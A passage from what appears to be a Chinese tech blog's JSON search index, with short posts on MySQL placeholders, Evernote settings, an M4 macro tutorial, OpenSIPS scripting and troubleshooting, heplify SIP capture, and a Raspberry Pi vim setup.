https://dev.mysql.com/doc/refman/8.0/en/sql-prepared-statements.html\nprepared语句的优点有以下几个\n优化查询速度 防止sql注入 但是也有一些限制\n不是所有语句都能用prepared语句。常见的用法应该是作为select where之后的条件,或者INSERT语句之后的值 不支持一个sql中多条查询语句的形式 ","permalink":"https://wdd.js.org/golang/mysql-placeholder/","summary":" Error EXTRA *mysql.MySQLError=Error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near \u0026lsquo;? ( 然而我仔细看了看sql语句,没有看出来究竟哪里有sql报错。\n然而当我把作为placeholder的问号去掉,直接用表的名字,sql是可以直接执行的。我意识到这个可能是和placeholder有关。\n搜索了一下,看到一个链接 https://github.com/go-sql-driver/mysql/issues/848\nPlaceholder can\u0026rsquo;t be used for table name or column name. It\u0026rsquo;s MySQL spec. Not bug of this project.\n大意是说,placeholder是不能作为表名或者列名的。\n在mysql关于prepared文档介绍中,在允许使用prepared的语句里,没有看到create table可以用placeholder https://dev.mysql.com/doc/refman/8.0/en/sql-prepared-statements.html\nprepared语句的优点有以下几个\n优化查询速度 防止sql注入 但是也有一些限制\n不是所有语句都能用prepared语句。常见的用法应该是作为select where之后的条件,或者INSERT语句之后的值 不支持一个sql中多条查询语句的形式 ","title":"mysql placeholder的错误使用方式"},{"content":"为什么是印象笔记 作为一个笔记,或者说文本编辑器,一个最基本的要求,就是能按照用户的按键输入。而不是用户输入了A,然后在页面上看到了B。\n但是对于印象笔记来说,我已经遇到过好多次因为输入问题,几乎想要放弃印象笔记。但是就目前来讲,仍然没有好用的替代品。\n对于笔记软件来说,我有以下的几个最为基础的要求。\n必须跨平台。能够有桌面端App和IOS或者安卓的APP 必须同步要快。 必须要能有网页剪藏的插件 必须要少折腾,用户体验好。我的目的是记录内容,而不是折腾各种同步或者网络配置。 必须是付费的产品。免费的产品,是没有可持续发展潜力的。当然,付费需要在接受范围之内。 必须足够稳定 用户界面,体验必须足够好 必须要离线使用 就目前来说,能满足以上几个要求的,屈指可数。\n印象笔记虽然有恶心的广告推送(即使会员也有广告),但是一般在非特殊的日子,广告不回一直存在的。\n印象笔记不太智能的替换 把英文单引号替换成中文单引号 把两个\u0026ndash;天换成一个中文破折号 以上两个问题,在粘贴代码的时候,是致命的问题。我本来粘贴的是两个\u0026ndash;,粘贴到印象笔记里居然变成一个中文破折号,那么后期在复制出来用的,必然出现问题。\n我问了官方的客服,官方的客户也不知道怎么解决。\n后来我自己在网上搜索,发现了解决问题的方法。\n以上所有的关于替换的问题,都是和编辑器的替换设置有关。\n打开一个笔记,然后点击右键\n选择替换,可以看到里面有智能引号,只能破折号,智能连接,文本替换,建议把这几个都取消勾选\n还有一个可能性,就是在**编辑-\u0026gt;拼写和语法-\u0026gt;自动拼写纠正,**这个要关闭。\n","permalink":"https://wdd.js.org/posts/2021/10/","summary":"为什么是印象笔记 作为一个笔记,或者说文本编辑器,一个最基本的要求,就是能按照用户的按键输入。而不是用户输入了A,然后在页面上看到了B。\n但是对于印象笔记来说,我已经遇到过好多次因为输入问题,几乎想要放弃印象笔记。但是就目前来讲,仍然没有好用的替代品。\n对于笔记软件来说,我有以下的几个最为基础的要求。\n必须跨平台。能够有桌面端App和IOS或者安卓的APP 必须同步要快。 必须要能有网页剪藏的插件 必须要少折腾,用户体验好。我的目的是记录内容,而不是折腾各种同步或者网络配置。 必须是付费的产品。免费的产品,是没有可持续发展潜力的。当然,付费需要在接受范围之内。 必须足够稳定 用户界面,体验必须足够好 必须要离线使用 就目前来说,能满足以上几个要求的,屈指可数。\n印象笔记虽然有恶心的广告推送(即使会员也有广告),但是一般在非特殊的日子,广告不回一直存在的。\n印象笔记不太智能的替换 把英文单引号替换成中文单引号 把两个\u0026ndash;天换成一个中文破折号 以上两个问题,在粘贴代码的时候,是致命的问题。我本来粘贴的是两个\u0026ndash;,粘贴到印象笔记里居然变成一个中文破折号,那么后期在复制出来用的,必然出现问题。\n我问了官方的客服,官方的客户也不知道怎么解决。\n后来我自己在网上搜索,发现了解决问题的方法。\n以上所有的关于替换的问题,都是和编辑器的替换设置有关。\n打开一个笔记,然后点击右键\n选择替换,可以看到里面有智能引号,只能破折号,智能连接,文本替换,建议把这几个都取消勾选\n还有一个可能性,就是在**编辑-\u0026gt;拼写和语法-\u0026gt;自动拼写纠正,**这个要关闭。","title":"印象笔记不太智能的智能替换"},{"content":"avp_db_query是用来做数据库查询的,如果查到某列的值是NULL, 那么对应到脚本里应该如何比较呢?\n可以用avp的值与\u0026quot;\u0026quot;, 进行比较\nif ($avp(status) == \u0026#34;\u0026lt;null\u0026gt;\u0026#34;) 参考 https://stackoverflow.com/questions/52675803/opensips-avp-db-query-cant-compare-null-value ","permalink":"https://wdd.js.org/opensips/ch5/avp-db-query/","summary":"avp_db_query是用来做数据库查询的,如果查到某列的值是NULL, 那么对应到脚本里应该如何比较呢?\n可以用avp的值与\u0026quot;\u0026quot;, 进行比较\nif ($avp(status) == \u0026#34;\u0026lt;null\u0026gt;\u0026#34;) 参考 https://stackoverflow.com/questions/52675803/opensips-avp-db-query-cant-compare-null-value ","title":"avp_db_query数值null值比较"},{"content":"文本处理的难点 有一个文本文件,内容如下,摘抄其中两行内容如下,里面有两个配置db_addr, local_ip这两个配置,需要在不同环境要修改的。\ndb_addr=1.2.3.4:3306 local_ip=192.168.2.4 但是哪些地方要修改呢?为了提醒后续的维护者,我们给要修改的地方加个备注吧。\ndb_addr=1.2.3.4:3306 # 这里要修改 local_ip=192.168.2.4 # 这里要修改 .... ... if len(a) = 1024 { # 这里要修改1024 ... } ... 用sed替换? 让别人一个一个地方去修改,也太麻烦了,有没有可能用脚本去处理呢?例如我们用DB_ADDR和LOCAL_IP这种字符串作为占位符,然后我们就可以用sed之类的命令去做替换了。\ndb_addr=DB_ADDR local_ip=LOCAL_IP sed -i \u0026#39;s/DB_ADDR/1.2.3.4:3306/g;s/LOCAL_IP/192.168.0.1/g\u0026#39; 1.cfg 这样做是有点方便了,但是也有以下几个问题\n如果定义的占位符太多,sed会变得越来越长 如果某些占位符里本身就含有/或者一些特殊含义的字符,就需要做特殊处理了 用M4吧,专业的人做专业的事情 apt-get install m4 通过命令行定义宏 1.m4\ndb_addr=DB_ADDR local_ip=LOCAL_IP .... ... if len(a) = MAX_LEN { ... } ... M4可以使用-D来定义宏和宏对应的值,默认输出到标准输出,我们可以用\u0026gt;将输出写到文件中\nm4 -D DB_ADDR=1.2.3.4:3306 -D LOCAL_IP=192.168.2.2 -D MAX_LEN=2048 1.m4 db_addr=1.2.3.4:3306 local_ip=192.168.2.2 .... ... if 1 = 2048 { ... } ... 用define语句定义宏 用define()语句来定义宏 用`\u0026lsquo;来作为字符串引用,避免被展开 define(`DB_ADDR\u0026#39;, `1.2.3.4:3306\u0026#39;) define(`LOCAL_IP\u0026#39;, `192.168.2.2\u0026#39;) define(`MAX_LEN\u0026#39;, `2048\u0026#39;) db_addr=DB_ADDR local_ip=LOCAL_IP .... ... if len(a) = MAX_LEN { ... } ... 执行命令m4 1.m4, 可以看到宏展开,但是有很多空行。\ndb_addr=1.2.3.4:3306 local_ip=192.168.2.2 .... ... if 1 = 2048 { ... } ...% 用dnl避免产生空行 在define语句的末尾,加上dnl\ndefine(`DB_ADDR\u0026#39;, `1.2.3.4:3306\u0026#39;)dnl define(`LOCAL_IP\u0026#39;, `192.168.2.2\u0026#39;)dnl define(`MAX_LEN\u0026#39;, `2048\u0026#39;)dnl db_addr=DB_ADDR local_ip=LOCAL_IP .... ... if len(a) = MAX_LEN { ... } ... 执行m4 1.m4 可以看到,空行没了\ndb_addr=1.2.3.4:3306 local_ip=192.168.2.2 .... ... if 1 = 2048 { ... } ... 抽离出宏配置文件 将1.m4分成两个文件1.m4, 1.conf\n1.conf\ndivert(-1) define(`DB_ADDR\u0026#39;, `1.2.3.4:3306\u0026#39;) define(`LOCAL_IP\u0026#39;, `192.168.2.2\u0026#39;) define(`MAX_LEN\u0026#39;, `2048\u0026#39;) divert(0) 1.m4\ndb_addr=DB_ADDR local_ip=LOCAL_IP .... ... if len(a) = MAX_LEN { ... } ... 执行:m4 1.conf 1.m4\ndb_addr=1.2.3.4:3306 local_ip=192.168.2.2 .... ... if 1 = 2048 { ... } ... 读取环境变量 define(`MY_NAME\u0026#39;, `esyscmd(`printf \u0026#34;${MY_NAME:-wdd}\u0026#34;\u0026#39;)\u0026#39;)dnl ","permalink":"https://wdd.js.org/posts/2021/09/","summary":"文本处理的难点 有一个文本文件,内容如下,摘抄其中两行内容如下,里面有两个配置db_addr, local_ip这两个配置,需要在不同环境要修改的。\ndb_addr=1.2.3.4:3306 local_ip=192.168.2.4 但是哪些地方要修改呢?为了提醒后续的维护者,我们给要修改的地方加个备注吧。\ndb_addr=1.2.3.4:3306 # 这里要修改 local_ip=192.168.2.4 # 这里要修改 .... ... if len(a) = 1024 { # 这里要修改1024 ... } ... 用sed替换? 让别人一个一个地方去修改,也太麻烦了,有没有可能用脚本去处理呢?例如我们用DB_ADDR和LOCAL_IP这种字符串作为占位符,然后我们就可以用sed之类的命令去做替换了。\ndb_addr=DB_ADDR local_ip=LOCAL_IP sed -i \u0026#39;s/DB_ADDR/1.2.3.4:3306/g;s/LOCAL_IP/192.168.0.1/g\u0026#39; 1.cfg 这样做是有点方便了,但是也有以下几个问题\n如果定义的占位符太多,sed会变得越来越长 如果某些占位符里本身就含有/或者一些特殊含义的字符,就需要做特殊处理了 用M4吧,专业的人做专业的事情 apt-get install m4 通过命令行定义宏 1.m4\ndb_addr=DB_ADDR local_ip=LOCAL_IP .... ... if len(a) = MAX_LEN { ... } ... M4可以使用-D来定义宏和宏对应的值,默认输出到标准输出,我们可以用\u0026gt;将输出写到文件中\nm4 -D DB_ADDR=1.2.3.4:3306 -D LOCAL_IP=192.168.2.2 -D MAX_LEN=2048 1.m4 db_addr=1.2.3.4:3306 local_ip=192.168.2.2 .... ... if 1 = 2048 { .","title":"简单实用的M4教程"},{"content":"ERROR:core:tcp_init_listener: could not get TCP protocol number CRITICAL:core:send_fd: sendmsg failed on 0: Socket operation on non-socket ERROR:core:send2child: send_fd failed 不要将tcp_child设置为0\n","permalink":"https://wdd.js.org/opensips/ch7/sendmsg-failed/","summary":"ERROR:core:tcp_init_listener: could not get TCP protocol number CRITICAL:core:send_fd: sendmsg failed on 0: Socket operation on non-socket ERROR:core:send2child: send_fd failed 不要将tcp_child设置为0","title":"sendmsg failed on 0: Socket operation on non-socket"},{"content":"问题表现 在经过初始化请求之后,路径发现完成。在这个dialog中所有的请求,正常来ua1和ua2之间的所有请求,都应该经过us1和us2。\n如下图所示:\n某些时候,ua1可能直接把BYE消息直接发送给ua2, 但是一般ua1和ua2是存在uat网络的,所以这个BYE消息,ua2很可能收不到。\n问题的表现就是电话无法正常挂断。\n问题分析 可能原因1: us1和us2没有做record-route, 导致请求直接根据某个请求的响应消息的Contact头,直接发送了。 可能原因2: 某些请求的拓扑隐藏没有做好 拓扑隐藏问题具体分析 假如我们在us1上正确的做了拓扑隐藏,那么ua1的所有收到的响应,它的Contact头的地址都会改成us1的地址。那么ua1是无论如何都获取不到ua2的直接地址的。\n但是,假如某个消息处理的不对呢?\n注意180响应5到6, 其中us1正确的修改了Contact头 ua1收到180后,立即发送了notify消息 如果us1没有正确处理notify的响应的Contact头,us1就会把ua2的Contact信息发送给ua1。有些notify的响应带有Contact头,有些没带有。 但是这里会出现一个竞争条件,invite的200ok和notify的200ok,消息到达的顺序,将影响ua2的Contact信息 如果ua1后收到invite的200ok, 此时ua1获取ua2的地址是us1 如果ua2后收到notify的200ok, 此时ua2获取的ua2的地址就是ua2 所以问题的表现可能是有偶现的,这种问题处理其实是比较棘手的 当然也是有解决方案的 方案1, us1对notify正确处理响应消息Contact, 将其修改成us1 方案2,us1直接删除notify响应消息的Contact头 ","permalink":"https://wdd.js.org/opensips/ch7/escape-msg/","summary":"问题表现 在经过初始化请求之后,路径发现完成。在这个dialog中所有的请求,正常来ua1和ua2之间的所有请求,都应该经过us1和us2。\n如下图所示:\n某些时候,ua1可能直接把BYE消息直接发送给ua2, 但是一般ua1和ua2是存在uat网络的,所以这个BYE消息,ua2很可能收不到。\n问题的表现就是电话无法正常挂断。\n问题分析 可能原因1: us1和us2没有做record-route, 导致请求直接根据某个请求的响应消息的Contact头,直接发送了。 可能原因2: 某些请求的拓扑隐藏没有做好 拓扑隐藏问题具体分析 假如我们在us1上正确的做了拓扑隐藏,那么ua1的所有收到的响应,它的Contact头的地址都会改成us1的地址。那么ua1是无论如何都获取不到ua2的直接地址的。\n但是,假如某个消息处理的不对呢?\n注意180响应5到6, 其中us1正确的修改了Contact头 ua1收到180后,立即发送了notify消息 如果us1没有正确处理notify的响应的Contact头,us1就会把ua2的Contact信息发送给ua1。有些notify的响应带有Contact头,有些没带有。 但是这里会出现一个竞争条件,invite的200ok和notify的200ok,消息到达的顺序,将影响ua2的Contact信息 如果ua1后收到invite的200ok, 此时ua1获取ua2的地址是us1 如果ua2后收到notify的200ok, 此时ua2获取的ua2的地址就是ua2 所以问题的表现可能是有偶现的,这种问题处理其实是比较棘手的 当然也是有解决方案的 方案1, us1对notify正确处理响应消息Contact, 将其修改成us1 方案2,us1直接删除notify响应消息的Contact头 ","title":"信令路径逃逸分析"},{"content":"hepfily是个独立的抓包程序,类似于tcpdump之类的,网络抓包程序,可以把抓到的sip包,编码为hep格式。然后送到hep server上,由hepserver负责包的整理和存储。\nheplify安装非常简单,在仓库的release页面,可以下载二进程程序。二进程程序赋予可执行权限后,可以直接在x86架构的机器上运行。\n因为heplify是go语言写的,你也可以基于源码,编译其他架构的二进制程序。\nhttps://github.com/sipcapture/heplify\n-i 设定抓包的网卡 -m 设置抓包模式为SIP -hs 设置hep server的地址 -p 设置日志文件的日志 -dim 设置过滤一些不关心的sip包 -pr 设置抓包的端口范围 nohup ./heplify \\ -i eno1 \\ -m SIP \\ -hs 192.168.1.2:9060 \\ -p \u0026#34;/var/log/\u0026#34; \\ -dim OPTIONS,REGISTER \\ -pr \u0026#34;18627-18628\u0026#34; \u0026amp; opensips模块本身就有proto_hep模块支持hep抓包,为什么我还要用heplify来抓包呢?\n低于2.2版本的opensips不支持hep抓包 opensips的hep抓包还是不太稳定。我曾遇到过因为hep抓包导致opensips崩溃的事故。如果用外部的抓包程序,即使抓包有问题,还是不会影响到opensips。 ","permalink":"https://wdd.js.org/opensips/tools/heplify/","summary":"hepfily是个独立的抓包程序,类似于tcpdump之类的,网络抓包程序,可以把抓到的sip包,编码为hep格式。然后送到hep server上,由hepserver负责包的整理和存储。\nheplify安装非常简单,在仓库的release页面,可以下载二进程程序。二进程程序赋予可执行权限后,可以直接在x86架构的机器上运行。\n因为heplify是go语言写的,你也可以基于源码,编译其他架构的二进制程序。\nhttps://github.com/sipcapture/heplify\n-i 设定抓包的网卡 -m 设置抓包模式为SIP -hs 设置hep server的地址 -p 设置日志文件的日志 -dim 设置过滤一些不关心的sip包 -pr 设置抓包的端口范围 nohup ./heplify \\ -i eno1 \\ -m SIP \\ -hs 192.168.1.2:9060 \\ -p \u0026#34;/var/log/\u0026#34; \\ -dim OPTIONS,REGISTER \\ -pr \u0026#34;18627-18628\u0026#34; \u0026amp; opensips模块本身就有proto_hep模块支持hep抓包,为什么我还要用heplify来抓包呢?\n低于2.2版本的opensips不支持hep抓包 opensips的hep抓包还是不太稳定。我曾遇到过因为hep抓包导致opensips崩溃的事故。如果用外部的抓包程序,即使抓包有问题,还是不会影响到opensips。 ","title":"heplify SIP信令抓包客户端"},{"content":"简介 OpenSIPS的路由脚本提供了几种不同类型的变量。不同类型的变量有以下几个方面的差异。\n变量的可见性 变量引用的值 变量的读写性质:有些变量是只读的,有些变量可读可写 变量是否有多个值:有些变量只有一个值,有些变量有多个值 语法 $(\u0026lt;context\u0026gt;name(subname)[index]{tramsformation}) 除了name以外 ,其他都是可选的值。\nname(必传):变量名的类型,例如pvar, avp, ru, DLG_status等等 subname: 变量名称,例如hdr(From), avp(name) index: 索引,某些变量可以有多个值,类似于数组。可以用索引去引用对应的元素。从0开始,也可以是负值如-1, 表示倒数第一个。 transformation: 转换。做一些格式转换,字符串截取等等操作 context: 上下文。OpenSIP有两个上下午,请求request、相应reply。想想一个场景,你在一个相应路由里如何拿到请求路由的某个值呢? 可以使用$(ru). 或者在一个失败路由里获取一个Concact的信息$(hdr(Contact)) 举例:\n仅仅通过类型来引用:$ru 通过类型和名称来引用:$hrd(Contact), 引用某个SIP header的值 通过类型和索引来引用:$(ct[0]) 通过类型、名称、索引来引用:$(avp(addr)[0]) 变量的类型 脚本变量 脚本变量只有一个值 脚本变量可读可写 脚本变量在路由及其子路由中都是可见的 脚本变量使用前务必先初始化,否则可能会引用到之前的值 脚本变量的值可以是字符串,也可以是整数类型 脚本变量读写比avp变量快 脚本变量会持久存在一个OpenSIPS进程中 将脚本变量设置为NULL, 实际上是将变量的值设置为'0\u0026rsquo;, 脚本变量没有NULL值。 脚本变量之存在与一个路由中 使用举例\nroute{ $var(a) = 19 $var(a) = \u0026#34;wdd\u0026#34; $var(a) = \u0026#34;wdd\u0026#34; + \u0026#34;@\u0026#34; + $td; if(route(check_out, 1)){ xlog(\u0026#34;check error\u0026#34;); } } route[check_out]{ # 注意,这里$var(a)的值就不存在了 xlog(\u0026#34;$var(a)\u0026#34;); if ($param(1) \u0026gt; 1) { return (-1); } return(1); } avp变量 avp变量一般会关联到一个sip消息或者SIP事务上. avp变量可以有多个值 可以avp变量理解成一个后进先出的栈 所有处理这个消息的子路由都可以获得avp的变量。但是如果想在响应路由中想获取请求路由中的avp变量,则需要设置TM模块的onreply_avp_mode参数:modparam(\u0026quot;tm\u0026quot;,\u0026quot;onreply_avp_mode\u0026quot;, 1) $avp(trunk)=\u0026#34;hello\u0026#34;; $avp(trunk)=\u0026#34;duan\u0026#34;; $avp(trunk)=\u0026#34;hi\u0026#34;; # 可以把trunk的值理解成下面的样子 # hi -\u0026gt; duan -\u0026gt; hello xlog(\u0026#34;$avp(trunk)\u0026#34;); 这里只能打印出hi xlog(\u0026#34;$(avp(trunk)[2])\u0026#34;); 这里能打印hello $avp(trunk)=NULL; 这里能删除最后的一个值,如果只有一个值,那么整个avp会被删除 avp_delete(\u0026#34;$avp(trunk)/g\u0026#34;); # 删除avp所有的值,包括这个avp自身。 $(avp(trunk)[1])=\u0026#34;heihei\u0026#34;; 重新赋值 $(avp(trunk)[1])=NULL; 删除某一个值 伪变量 伪变量主要是对SIP消息的各个部分进行引用的\n大部分伪变量很好接,都是缩写的单词的首字母。\n伪变量以$开头,加sip消息字段的缩写,例如$ci, 代表sip callID 序号 名称 是否可修改 含义 1 $ai 引用P-Asserted-Identify头的url 2 $adu Authentication Digest URI 3 $ar Authentication realm 4 $au Auth username user 5 $ad Auth username domain 6 $an Auth nonce 7 $auth.resp Auth response 8 $auth.nonce Auth nonce 9 $auth.opaque the opaque 字符串 10 $auth.alg 认证算法 11 $auth.qop qop参数的值 12 $auth.nc nonce count参数 13 $aU 整个username 14 $Au 计费用的账户名,主要是acc会用 15 $argv 获取通过命令行参数设置参数-o。例如在启动opensips时```bash opensips -o maxsiplength=1200 \u0026lt;br /\u0026gt;\u0026lt;br /\u0026gt;在脚本里就可以通过$argv(maxsiplength)\u0026lt;br /\u0026gt;```bash xlog(\u0026#34;maxsiplength: is $argv(maxsiplength)\u0026#34;) | | 16 | $af | | ip协议,可能是INET(ipv4), 或者是INET6(ipv6) | | 17 | $branch | | 用来创建新的分支```bash $branch=\u0026ldquo;sip:new#domain\u0026rdquo;;\n| | 18 | $branch() | | \u0026lt;br /\u0026gt;- $branch(uri)\u0026lt;br /\u0026gt;- $branch(duri)\u0026lt;br /\u0026gt;- $branch(q)\u0026lt;br /\u0026gt;- $branch(path)\u0026lt;br /\u0026gt;- $branch(flags)\u0026lt;br /\u0026gt;- $branch(socket)\u0026lt;br /\u0026gt; | | 19 | **$ci** | | 引用sip call-id。 (call-id) | | 20 | **$cl** | | 引用sip body部分的长度。(content-length) | | 21 | $cs | | 引用 cseq number | | 22 | $ct | | 引用Contact\u0026lt;br /\u0026gt;- $ci\u0026lt;br /\u0026gt;- $(ct[n])\u0026lt;br /\u0026gt;- $(ct[-n])\u0026lt;br /\u0026gt; | | 23 | $ct.fields() | \u0026lt;br /\u0026gt; | \u0026lt;br /\u0026gt;- $ct.fields(name)\u0026lt;br /\u0026gt;- $ct.fields(uri)\u0026lt;br /\u0026gt;- $ct.fields(q)\u0026lt;br /\u0026gt;- $ct.fields(expires)\u0026lt;br /\u0026gt;- $ct.fields(methods)\u0026lt;br /\u0026gt;- $ct.fields(received)\u0026lt;br /\u0026gt;- $ct.fields(params) 所有的参数\u0026lt;br /\u0026gt; | | 24 | $cT | | \u0026lt;br /\u0026gt;- $cT Content-Type\u0026lt;br /\u0026gt;- $(cT[n])\u0026lt;br /\u0026gt;- $(cT[-n])\u0026lt;br /\u0026gt;- $(cT[*])\u0026lt;br /\u0026gt; | | 25 | **$dd** | | 引用目标url里面的domain部分 | | 26 | $di | | diversion header | | 27 | $dip | | diversion privacy prameter | | 29 | $dir | | diversion reason parameter | | 30 | $dp | | 目标url的端口号部分 (destionation port) | | 31 | $dP | | 目标url的传输协议部分 (destionation protocol) | | 32 | $ds | | destionation set | | 33 | **$du** | | 引用 destionation url | | 34 | $err.class | | 错误的类别\u0026lt;br /\u0026gt;- 1 解析错误\u0026lt;br /\u0026gt; | | 35 | $err.level | | 错误的级别 | | 36 | $err.info | | 错误信息的描述 | | 37 | $err.rcode | | error reply code | | 38 | $err.rreason | | error reply reason | | 39 | **$fd** | | From URI domain | | 40 | **$fn** | | From display name | | 41 | **$fs** | | 强制使用某个地址发送消息。 (forced socket)\u0026lt;br /\u0026gt;格式:proto:ip:port | | 42 | $ft | | From tag | | 43 | **$fu** | | From URL | | 44 | **$fU** | | username in From URL | | 45 | **$log_level** | | 可以用来动态修改日志级别\u0026lt;br /\u0026gt;$log_level=4;\u0026lt;br /\u0026gt;\u0026lt;br /\u0026gt;$log_level=NULL; 恢复默认值 | | 46 | $mb | | sip message buffer | | 47 | $mf | | message flags | | 48 | $mi | | sip message id | | 49 | **$ml** | | sip message length | | 50 | $od | | domain in original R-URI | | 51 | $op | | port in original R-URI | | 52 | $oP | | transport protocol of original R-URI | | 53 | $ou | | original URI | | 54 | $oU | | username in original URI | | 55 | **$param(idx)** | | 引用路由参数,从1开始\u0026lt;br /\u0026gt;```bash route{ route(R_NAME, $var(debug), \u0026#34;pp\u0026#34;); } route[R_NAME]{ $param(1); #引用第一个参数 $var(debug) $param(2); #引用第二个参数 pp } | | 56 | $pd | | domain in sip P-Prefered-Identify header | | 57 | $pn | | display name in sip P-Prefered-Identify header | | 58 | $pp | | process id | | 59 | $pr $proto | | 接受消息的协议 UDP, TCP, TLS, SCTP, WS | | 60 | $pu | | URL in sip P-Prefered-Identify header | | 61 | $rd | | domain in request url | | 62 | $rb | | body of request/replay- $rb- $(rb[*])- $(rb[n])- $(rb[-n])- $rb(application/sdp)- $rb(application/isup) | | 63 | $rc $retcode | | 上个函数的返回结果 | | 64 | $re | | remote-party-id | | 65 | $rm | | sip method | | 66 | $rp | | port of R-RUI | | 67 | $rP | | transport protocol pf R-URI | | 68 | $rr | | reply reason | | 69 | $rs | | reply status | | 70 | $ru | | request url | | 71 | $rU | | | | 72 | $ru_q | | | | 73 | $Ri | | | | 74 | $Rp | | | | 75 | $sf | | | | 76 | $si | | | | 77 | $sp | | | | 78 | $tt | | | | 79 | $tu | | | | 80 | $tU | | | | 81 | $time(format) | | | | 82 | $T_branch_idx | | | | 83 | $Tf | | | | 84 | $Ts | | | | 85 | $Tsm | | | | 86 | $TS | | | | 87 | $ua | | | | 88 | $(hdr(name)[N]) | | | | 89 | $rT | | | | 90 | $cfg_line $cfg_file | | | | 91 | $xlog_level | | |\n","permalink":"https://wdd.js.org/opensips/ch5/core-var-2/","summary":"简介 OpenSIPS的路由脚本提供了几种不同类型的变量。不同类型的变量有以下几个方面的差异。\n变量的可见性 变量引用的值 变量的读写性质:有些变量是只读的,有些变量可读可写 变量是否有多个值:有些变量只有一个值,有些变量有多个值 语法 $(\u0026lt;context\u0026gt;name(subname)[index]{tramsformation}) 除了name以外 ,其他都是可选的值。\nname(必传):变量名的类型,例如pvar, avp, ru, DLG_status等等 subname: 变量名称,例如hdr(From), avp(name) index: 索引,某些变量可以有多个值,类似于数组。可以用索引去引用对应的元素。从0开始,也可以是负值如-1, 表示倒数第一个。 transformation: 转换。做一些格式转换,字符串截取等等操作 context: 上下文。OpenSIP有两个上下午,请求request、相应reply。想想一个场景,你在一个相应路由里如何拿到请求路由的某个值呢? 可以使用$(ru). 或者在一个失败路由里获取一个Concact的信息$(hdr(Contact)) 举例:\n仅仅通过类型来引用:$ru 通过类型和名称来引用:$hrd(Contact), 引用某个SIP header的值 通过类型和索引来引用:$(ct[0]) 通过类型、名称、索引来引用:$(avp(addr)[0]) 变量的类型 脚本变量 脚本变量只有一个值 脚本变量可读可写 脚本变量在路由及其子路由中都是可见的 脚本变量使用前务必先初始化,否则可能会引用到之前的值 脚本变量的值可以是字符串,也可以是整数类型 脚本变量读写比avp变量快 脚本变量会持久存在一个OpenSIPS进程中 将脚本变量设置为NULL, 实际上是将变量的值设置为'0\u0026rsquo;, 脚本变量没有NULL值。 脚本变量之存在与一个路由中 使用举例\nroute{ $var(a) = 19 $var(a) = \u0026#34;wdd\u0026#34; $var(a) = \u0026#34;wdd\u0026#34; + \u0026#34;@\u0026#34; + $td; if(route(check_out, 1)){ xlog(\u0026#34;check error\u0026#34;); } } route[check_out]{ # 注意,这里$var(a)的值就不存在了 xlog(\u0026#34;$var(a)\u0026#34;); if ($param(1) \u0026gt; 1) { return (-1); } return(1); } avp变量 avp变量一般会关联到一个sip消息或者SIP事务上.","title":"核心变量解读-100%"},{"content":"配置 树莓派3B+的配置\n4核1G CPU ARMv7 Processor 64G SD卡 常用软件 neovim LXTerminal终端 chrome浏览器 谷歌拼音输入法 常用语言 golang c nodejs 外设 键盘鼠标: 雷柏 无线机械键盘加鼠标 150块左右 屏幕:一块ipad大小外接屏幕,400块左右 常用工作 Golang UDP Server开发, 总体还算流畅。前提时不要加载太多的neovim插件,特别象coc-vim, go-vim等插件,安装过后让你卡的绝望。每次当我绝望之时,我就关闭了图形界面,回到终端继续干活。但是即使使用纯文本方式登录,运行vim还是很卡。 后来我在macbook pro上也用neovim开发,发现也是很卡。于是我就释然了,9千多的macbook都卡,300多的树莓派卡一点怎么了! 但是卡顿还是非常影响心情的,于是我就大量精简vim的插件。 我基本上就用两个插件,都是和状态栏有关的。其他十二个插件都给注释掉了 call plug#begin(\u0026#39;~/.vim/plugged\u0026#39;) Plug \u0026#39;vim-airline/vim-airline\u0026#39; Plug \u0026#39;vim-airline/vim-airline-themes\u0026#39; Plug \u0026#39;jiangmiao/auto-pairs\u0026#39; \u0026#34;Plug \u0026#39;yonchu/accelerated-smooth-scroll\u0026#39; \u0026#34;Plug \u0026#39;preservim/tagbar\u0026#39;, { \u0026#39;for\u0026#39;: [\u0026#39;go\u0026#39;, \u0026#39;c\u0026#39;]} \u0026#34;Plug \u0026#39;airblade/vim-gitgutter\u0026#39; \u0026#34;Plug \u0026#39;fatih/vim-go\u0026#39;, { \u0026#39;do\u0026#39;: \u0026#39;:GoUpdateBinaries\u0026#39;, \u0026#39;for\u0026#39;: \u0026#39;go\u0026#39; } \u0026#34;Plug \u0026#39;dense-analysis/ale\u0026#39; \u0026#34;Plug \u0026#39;vim-scripts/matchit.zip\u0026#39; \u0026#34;Plug \u0026#39;pangloss/vim-javascript\u0026#39;, {\u0026#39;for\u0026#39;:\u0026#39;javascript\u0026#39;} \u0026#34;Plug \u0026#39;leafgarland/typescript-vim\u0026#39; \u0026#34;Plug \u0026#39;neoclide/coc.nvim\u0026#39;, {\u0026#39;branch\u0026#39;: \u0026#39;release\u0026#39;} \u0026#34;Plug \u0026#39;jremmen/vim-ripgrep\u0026#39; \u0026#34;Plug \u0026#39;plasticboy/vim-markdown\u0026#39; \u0026#34;Plug \u0026#39;mzlogin/vim-markdown-toc\u0026#39; call plug#end() filetype plugin indent on filetype plugin on filetype indent on set guicursor= set history=1000 let g:netrw_banner=0 let g:ale_linters = { \\ \u0026#39;javascript\u0026#39;: [\u0026#39;standard\u0026#39;], \\ \u0026#39;typescript\u0026#39;: [\u0026#39;tsserver\u0026#39;] \\} let g:ale_fixers = {\u0026#39;javascript\u0026#39;: [\u0026#39;standard\u0026#39;]} let g:ale_lint_on_save = 1 let g:ale_fix_on_save = 1 let g:ale_typescript_tsserver_executable=\u0026#39;tsserver\u0026#39; let g:airline#extensions#tabline#enabled = 1 let g:ale_set_loclist = 0 let g:ale_set_quickfix = 1 let g:ale_open_list = 0 let g:vim_markdown_folding_disabled = 1 let g:vmt_cycle_list_item_markers = 1 let g:tagbar_sort = 0 \u0026#34; colorscheme codedark \u0026#34; let g:airline_theme = \u0026#39;codedark\u0026#39; \u0026#34; \u0026#34; buffer let mapleader = \u0026#34;,\u0026#34; nnoremap \u0026lt;Leader\u0026gt;j :bp\u0026lt;CR\u0026gt; \u0026#34; previous buffer nnoremap \u0026lt;Leader\u0026gt;k :bn\u0026lt;CR\u0026gt; \u0026#34; next buffer nnoremap \u0026lt;Leader\u0026gt;n :bf\u0026lt;CR\u0026gt; \u0026#34; previous buffer nnoremap \u0026lt;Leader\u0026gt;m :bl\u0026lt;CR\u0026gt; \u0026#34; next buffer nnoremap \u0026lt;Leader\u0026gt;l :b#\u0026lt;CR\u0026gt; \u0026#34; previous buffer nnoremap \u0026lt;Leader\u0026gt;e :e\u0026lt;CR\u0026gt; \u0026#34; open netrw nnoremap 